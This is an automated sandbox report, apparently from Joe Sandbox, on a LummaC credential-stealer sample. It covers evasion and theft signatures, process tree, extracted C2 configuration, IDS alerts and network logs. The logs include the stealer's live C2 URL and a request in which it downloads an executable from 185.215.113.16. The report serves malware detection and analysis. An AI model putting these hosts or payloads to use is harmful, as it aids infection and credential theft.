Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1561644
MD5:	88a2e1dc5f57311dc42a7d57dc7d9827
SHA1:	a26e33ea17b7d5ca3272e8a7521f141c927d1b75
SHA256:	c2c829ba69f689fe392435d8b886c002e050d3bb4cc6ec8f62317ceaa7ba02da
Tags:	exeuser-Bitsight
Infos:

Detection

LummaC Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

C2 URLs / IPs found in malware configuration

Hides threads from debuggers

Machine Learning detection for sample

PE file contains section with special chars

Query firmware table information (likely to detect VMs)

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Downloads executable code via HTTP

Entry point lies outside standard sections

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Searches for user specific document files

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

file.exe (PID: 2608 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 88A2E1DC5F57311DC42A7D57DC7D9827)

chrome.exe (PID: 6544 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 6608 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=1712,i,16499392452807308267,17586683353551675273,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 7444 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 7636 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=2012,i,16342311137299287003,18054011809701615545,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cleanup

Malware Configuration

Threatname: LummaC

{"C2 url": "https://property-imper.sbs/api", "Build Version": "LOGS11--LiveTraffi"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
Process Memory Space: file.exe PID: 2608	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 2608	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-24T03:04:08.063341+0100	2028371	3	Unknown Traffic	192.168.2.5	49704	104.21.33.116	443	TCP
2024-11-24T03:04:10.117380+0100	2028371	3	Unknown Traffic	192.168.2.5	49705	104.21.33.116	443	TCP
2024-11-24T03:04:12.418353+0100	2028371	3	Unknown Traffic	192.168.2.5	49706	104.21.33.116	443	TCP
2024-11-24T03:04:14.712370+0100	2028371	3	Unknown Traffic	192.168.2.5	49707	104.21.33.116	443	TCP
2024-11-24T03:04:17.226185+0100	2028371	3	Unknown Traffic	192.168.2.5	49708	104.21.33.116	443	TCP
2024-11-24T03:04:19.914033+0100	2028371	3	Unknown Traffic	192.168.2.5	49709	104.21.33.116	443	TCP
2024-11-24T03:04:22.887334+0100	2028371	3	Unknown Traffic	192.168.2.5	49710	104.21.33.116	443	TCP
2024-11-24T03:04:27.849976+0100	2028371	3	Unknown Traffic	192.168.2.5	49722	104.21.33.116	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-24T03:04:08.756732+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49704	104.21.33.116	443	TCP
2024-11-24T03:04:10.843734+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49705	104.21.33.116	443	TCP
2024-11-24T03:04:28.607200+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49722	104.21.33.116	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-24T03:04:08.756732+0100	2049836	1	A Network Trojan was detected	192.168.2.5	49704	104.21.33.116	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-24T03:04:10.843734+0100	2049812	1	A Network Trojan was detected	192.168.2.5	49705	104.21.33.116	443	TCP

ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-24T03:04:30.108472+0100	2019714	2	Potentially Bad Traffic	192.168.2.5	49729	185.215.113.16	80	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-24T03:04:20.641197+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.5	49709	104.21.33.116	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Found malware configuration

Source: file.exe.2608.0.memstrmin

Malware Configuration Extractor: LummaC {"C2 url": "https://property-imper.sbs/api", "Build Version": "LOGS11--LiveTraffi"}

Multi AV Scanner detection for submitted file

Source: file.exe

Virustotal: Detection: 51%

Perma Link

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0	HTTP Parser: No favicon
Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0	HTTP Parser: No favicon
Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0	HTTP Parser: No favicon
Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0	HTTP Parser: No favicon

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49766 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.5:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.5:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.5:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.5:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.5:49754 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.5:49811 version: TLS 1.2

Source:

Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: file.exe, 00000000.00000003.2361037563.00000000085C0000.00000004.00001000.00020000.00000000.sdmp

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49705 -> 104.21.33.116:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49705 -> 104.21.33.116:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49704 -> 104.21.33.116:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49704 -> 104.21.33.116:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49709 -> 104.21.33.116:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49722 -> 104.21.33.116:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://property-imper.sbs/api

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 24 Nov 2024 02:04:29 GMTContent-Type: application/octet-streamContent-Length: 2842624Last-Modified: Sun, 24 Nov 2024 02:00:08 GMTConnection: keep-aliveETag: "674288a8-2b6000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 c0 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 2c 00 00 04 00 00 b6 27 2c 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 68 65 63 6c 6f 66 6d 73 00 00 2b 00 00 a0 00 00 00 00 2b 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6f 77 74 78 73 6f 75 6b 00 20 00 00 00 a0 2b 00 00 04 00 00 00 3a 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 c0 2b 00 00 22 00 00 00 3e 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: Joe Sandbox View	IP Address: 13.107.246.63 13.107.246.63
Source: Joe Sandbox View	IP Address: 185.215.113.16 185.215.113.16
Source: Joe Sandbox View	IP Address: 239.255.255.250 239.255.255.250

Source: Joe Sandbox View	JA3 fingerprint: 1138de370e523e824bbca92d049a3777
Source: Joe Sandbox View	JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49708 -> 104.21.33.116:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49707 -> 104.21.33.116:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49704 -> 104.21.33.116:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49706 -> 104.21.33.116:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49709 -> 104.21.33.116:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49705 -> 104.21.33.116:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49722 -> 104.21.33.116:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49710 -> 104.21.33.116:443
Source: Network traffic	Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.5:49729 -> 185.215.113.16:80

Source: unknown

HTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49766 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16

Source: global traffic	HTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=O+PWlvUr11LBdsr&MD=VdRA74wY HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET /mscc/lib/v2/wcp-consent.js HTTP/1.1Host: wcpstatic.microsoft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://learn.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /scripts/c/ms.jsll-4.min.js HTTP/1.1Host: js.monitor.azure.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://learn.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /scripts/c/ms.jsll-4.min.js HTTP/1.1Host: js.monitor.azure.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /mscc/lib/v2/wcp-consent.js HTTP/1.1Host: wcpstatic.microsoft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=O+PWlvUr11LBdsr&MD=VdRA74wY HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16

Source: chromecache_110.5.dr, chromecache_122.5.dr	String found in binary or memory: href="https://www.facebook.com/sharer/sharer.php?u=${s}" equals www.facebook.com (Facebook)
Source: chromecache_110.5.dr, chromecache_122.5.dr	String found in binary or memory: href="https://www.linkedin.com/cws/share?url=${s}" equals www.linkedin.com (Linkedin)
Source: chromecache_110.5.dr, chromecache_122.5.dr	String found in binary or memory: </section>`}function Dce(e=tw,t=gp){return sl(M4,e,t)}function $ce(e=aw,t=sw){return sl(t4,e,t)}var vI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(vI\|\|{}),LRe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function $x(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=L.sharingId?`&sharingId=${L.sharingId}`:"";return Object.values(vI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let 